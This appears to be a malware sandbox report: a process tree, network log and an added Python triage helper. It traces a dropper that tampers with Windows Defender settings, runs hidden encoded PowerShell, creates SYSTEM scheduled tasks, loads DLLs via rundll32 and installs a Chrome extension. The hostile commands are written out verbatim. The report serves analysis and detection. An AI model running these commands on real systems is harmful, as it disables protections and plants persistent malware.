          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1312
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2380
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1548
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1068
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:916
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2220
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gVyHgzwqh" /SC once /ST 04:19:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2444
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gVyHgzwqh"
        3⤵
        PID:1608
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gVyHgzwqh"
        3⤵
        PID:2748
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        3⤵
        PID:2636
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
          4⤵
          PID:2160
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        3⤵
        PID:2460
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
          4⤵
          PID:2124
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:01:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe\" aK /QhUOdidwt 525403 /S" /V1 /F
        3⤵
        • Drops file in Windows directory
        • Scheduled Task/Job: Scheduled Task
        PID:2660
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "LTdmnWMddFrWELagp"
        3⤵
        PID:2612
      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 484
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2684
                                                                                    • C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe
                                                                                      C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe aK /QhUOdidwt 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:2664
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bbMwfSaEkvrmTtNtmp"
                                                                                        3⤵
                                                                                          PID:2020
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1976
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2700
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:872
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1700
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2932
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:2240
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2916
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2244
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2964
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MaCEdJmjU\szzNjM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dZgNXlBFHKJPYkR" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1712
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "dZgNXlBFHKJPYkR2" /F /xml "C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2724
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "dZgNXlBFHKJPYkR"
                                                                                                    3⤵
                                                                                                      PID:2816
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "dZgNXlBFHKJPYkR"
                                                                                                      3⤵
                                                                                                        PID:2024
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "RnVvAZaQEByRQe" /F /xml "C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2600
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "bxpvtvpljnCBk2" /F /xml "C:\ProgramData\hDwfgHvtnjxOxeVB\FFvMggw.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1964
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "dfBKvmetieHVblCDx2" /F /xml "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2504
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "UKqBjuPeLLAHSylBWrg2" /F /xml "C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1148
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "rrUPsTjgSYBWMUseO" /SC once /ST 04:42:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll\",#1 /gzLLdidVZe 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1368
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "rrUPsTjgSYBWMUseO"
                                                                                                        3⤵
                                                                                                          PID:892
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "LTdmnWMddFrWELagp"
                                                                                                          3⤵
                                                                                                            PID:1768
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1556
                                                                                                            3⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:2960
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 525403
                                                                                                          2⤵
                                                                                                            PID:1276
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 525403
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in System32 directory
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:3000
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "rrUPsTjgSYBWMUseO"
                                                                                                                4⤵
                                                                                                                  PID:1628
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {E9DF4908-5695-4DAA-8304-5913600E82D3} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1664
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1144
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2828
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1868
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1560
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1516
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:2532
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2932
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:924
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2744
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1744901112187078600011220915002101587676-1492275783612922105709375028379580899"
                                                                                                                        1⤵
                                                                                                                          PID:2660
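The command lines above are the report's own data; the helper below is an added example (not part of the Triage report and not code from the sample) that triages them offline. It decodes the PowerShell -EncodedCommand payload (UTF-16LE base64), tokenises the schtasks invocations with Windows-style quoting, flags the Defender policy-key and MSFT_MpPreference exclusion edits, the forfiles /c proxy launch and the rundll32 "dll",#1 ordinal calls, and separates tasks the sample created and then deleted in the same run (one-shot launchers that run a payload as SYSTEM) from those it left in place. The tag names are my own, and SAMPLE_CMDLINES is a constructed list copied from the tree above.

```python
import base64
import re

# Constructed sample input: command lines copied from the process tree above.
SAMPLE_CMDLINES = [
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32',
    r'schtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:01:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe\" aK /QhUOdidwt 525403 /S" /V1 /F',
    r'schtasks /run /I /tn "LTdmnWMddFrWELagp"',
    r'forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MaCEdJmjU\szzNjM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dZgNXlBFHKJPYkR" /V1 /F',
    r'schtasks /CREATE /TN "dZgNXlBFHKJPYkR2" /F /xml "C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml" /RU "SYSTEM"',
    r'schtasks /END /TN "dZgNXlBFHKJPYkR"',
    r'schtasks /DELETE /F /TN "dZgNXlBFHKJPYkR"',
    r'schtasks /DELETE /F /TN "LTdmnWMddFrWELagp"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'gpscript.exe /RefreshSystemParam',
    r'C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 525403',
]

# Windows argument: "..." (with \" escapes inside) or a bare run of non-space characters.
# Known limitation: a backslash directly before a closing quote is ambiguous in Windows quoting.
TOKEN_RE = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')
ENCODED_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.I)
DEFENDER_POLICY_RE = re.compile(r'\breg(?:\.exe)?\s+(?:add|delete)\b.*\\Policies\\Microsoft\\Windows Defender', re.I)
MP_PREFERENCE_RE = re.compile(r'MSFT_MpPreference\s+call\s+(?:Add|Remove)\s+Exclusion|\b(?:Add|Remove)-MpPreference\b.*-Exclusion', re.I)
FORFILES_PROXY_RE = re.compile(r'\bforfiles(?:\.exe)?\b.*\s/c\s+"', re.I)
RUNDLL_ORDINAL_RE = re.compile(r'\brundll32(?:\.exe)?\b.*,#\d+', re.I)
GP_REFRESH_RE = re.compile(r'\bgpupdate(?:\.exe)?\b.*/force|\bgpscript(?:\.exe)?\b.*/RefreshSystemParam', re.I)


def tokenize(cmdline):
    """Split a Windows command line into arguments, unescaping \\" inside quoted ones."""
    return [q.replace('\\"', '"') if bare == "" else bare for q, bare in TOKEN_RE.findall(cmdline)]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_schtasks(cmdline):
    """Extract action, /TN name, /RU account, /TR command, /SC trigger and /XML path
    from a schtasks invocation; None when the line is not schtasks at all."""
    toks = tokenize(cmdline)
    if not toks or toks[0].rsplit("\\", 1)[-1].lower() not in ("schtasks", "schtasks.exe"):
        return None
    info = dict(action=None, name=None, runas=None, command=None, schedule=None, xml=None)
    valued = {"/tn": "name", "/ru": "runas", "/tr": "command", "/sc": "schedule", "/xml": "xml"}
    i = 1
    while i < len(toks):
        t = toks[i].lower()
        if t in ("/create", "/run", "/delete", "/end"):
            info["action"] = t[1:]
        elif t in valued and i + 1 < len(toks):
            info[valued[t]] = toks[i + 1]
            i += 1
        i += 1
    return info


def classify(cmdline):
    """Tag one command line with the behaviours an analyst wants surfaced."""
    tags = set()
    if DEFENDER_POLICY_RE.search(cmdline):
        tags.add("defender-policy-modified")      # flagged in either direction, add or delete
    if MP_PREFERENCE_RE.search(cmdline):
        tags.add("defender-exclusion-modified")   # MSFT_MpPreference Add/Remove Exclusion*
    if FORFILES_PROXY_RE.search(cmdline):
        tags.add("lolbin-forfiles-proxy")         # forfiles /c used purely as a launcher
    if RUNDLL_ORDINAL_RE.search(cmdline):
        tags.add("rundll32-export-call")          # rundll32 "x.dll",#N: export by ordinal
    if GP_REFRESH_RE.search(cmdline):
        tags.add("group-policy-refresh")          # makes a Policies key edit take effect now
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded-powershell")
        tags |= classify(decoded)                 # classify the decoded payload as well
    task = parse_schtasks(cmdline)
    if task and task["action"] == "create":
        if (task["runas"] or "").upper() == "SYSTEM":
            tags.add("schtasks-create-as-system")
        if (task["schedule"] or "").upper() == "ONLOGON":
            tags.add("schtasks-logon-persistence")
        if task["xml"]:
            tags.add("schtasks-from-xml")         # the trigger lives in the dropped XML file
    return tags


def task_lifecycle(cmdlines):
    """Return (torn_down, surviving): tasks created then deleted in the same run were
    one-shot SYSTEM launchers; tasks created and left in place are persistence."""
    created, deleted = [], set()
    for line in cmdlines:
        t = parse_schtasks(line)
        if not t or not t["name"]:
            continue
        if t["action"] == "create" and t["name"] not in created:
            created.append(t["name"])
        elif t["action"] == "delete":
            deleted.add(t["name"])
    return [n for n in created if n in deleted], [n for n in created if n not in deleted]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        if classify(line):
            print(f"{sorted(classify(line))}  <-  {line[:70]}")
    print("torn down / surviving tasks:", task_lifecycle(SAMPLE_CMDLINES))
```

Two caveats when reading the output against this report. First, the REG DELETE and Remove ExclusionExtension lines visible here are the removal direction; the classifier flags both directions because a process rewriting the Defender policy key or exclusion list is worth a look regardless of which way it goes, and the gpupdate /force launched from the encoded PowerShell right afterwards is what makes a Policies edit apply without waiting for the refresh interval. Second, for the tasks registered with /xml the trigger and action are not on the command line at all, so the dropped .xml files under Program Files (x86) and ProgramData are the artefacts to pull.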

                                                                                                                        Network

• [US] DNS service-domain.xyz (pjDElFp.exe)
  Remote address: 8.8.8.8:53
  Request:
    service-domain.xyz IN A
  Response:
    service-domain.xyz IN A 54.210.117.250
• [US] DNS c.pki.goog (pjDElFp.exe)
  Remote address: 8.8.8.8:53
  Request:
    c.pki.goog IN A
  Response:
    c.pki.goog IN CNAME pki-goog.l.google.com
    pki-goog.l.google.com IN A 216.58.201.99
• [GB] GET http://c.pki.goog/r/r1.crl (pjDElFp.exe)
  Remote address: 216.58.201.99:80
  Request:
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
  Response:
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Mon, 22 Jul 2024 04:57:24 GMT
    Expires: Mon, 22 Jul 2024 05:47:24 GMT
    Cache-Control: public, max-age=3000
    Age: 1008
    Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
• [US] DNS o.pki.goog (pjDElFp.exe)
  Remote address: 8.8.8.8:53
  Request:
    o.pki.goog IN A
  Response:
    o.pki.goog IN CNAME pki-goog.l.google.com
    pki-goog.l.google.com IN A 216.58.201.99
• [GB] GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ (pjDElFp.exe)
  Remote address: 216.58.201.99:80
  Request:
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response:
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 22 Jul 2024 05:00:47 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 805
• [GB] GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94 (pjDElFp.exe)
  Remote address: 216.58.201.99:80
  Request:
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response:
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 22 Jul 2024 04:46:38 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1655
• [GB] GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D (pjDElFp.exe)
  Remote address: 216.58.201.99:80
  Request:
    GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
  Response:
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 471
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 22 Jul 2024 04:29:43 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 2670
• [US] DNS clients2.google.com (pjDElFp.exe)
  Remote address: 8.8.8.8:53
  Request:
    clients2.google.com IN A
  Response:
    clients2.google.com IN CNAME clients.l.google.com
    clients.l.google.com IN A 142.250.200.14
• [GB] GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW (pjDElFp.exe)
  Remote address: 142.250.200.14:443
  Request:
    GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW HTTP/1.1
    Host: clients2.google.com
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 302 Moved Temporarily
    Content-Security-Policy: script-src 'report-sample' 'nonce-zTP6_TZBpkOMdGLcgMZhFQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
